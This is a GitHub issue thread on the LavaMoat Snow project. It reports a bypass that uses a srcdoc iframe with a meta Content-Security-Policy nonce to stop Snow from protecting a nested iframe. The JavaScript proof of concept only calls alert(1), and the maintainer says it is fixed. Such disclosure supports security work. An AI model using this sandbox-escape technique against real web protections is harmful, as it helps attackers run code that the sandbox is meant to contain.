Bypass using CSP - Githubissues

LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!

https://lavamoat.github.io/snow/demo/

MIT License

102 stars 9 forks source link

Bypass using CSP #94

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago

var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML = `
<iframe
    srcdoc="
    <meta http-equiv='Content-Security-Policy' content=&quot;script-src 'nonce-pwnd' ;&quot;>
        <iframe src=&quot;javascript:haha&quot;>
        </iframe>
    <script nonce=&quot;pwnd&quot;>frames[0].alert(1);</script>">
</iframe>`

Similar to https://github.com/LavaMoat/snow/issues/90 and https://github.com/LavaMoat/snow/issues/92, using CSP to prevent SNOW_WINDOW from running :)

weizman commented 1 year ago

Think I'm gonna remove srcdoc CSP attempts all together (read further @ #104)

weizman commented 1 year ago

fixed by #104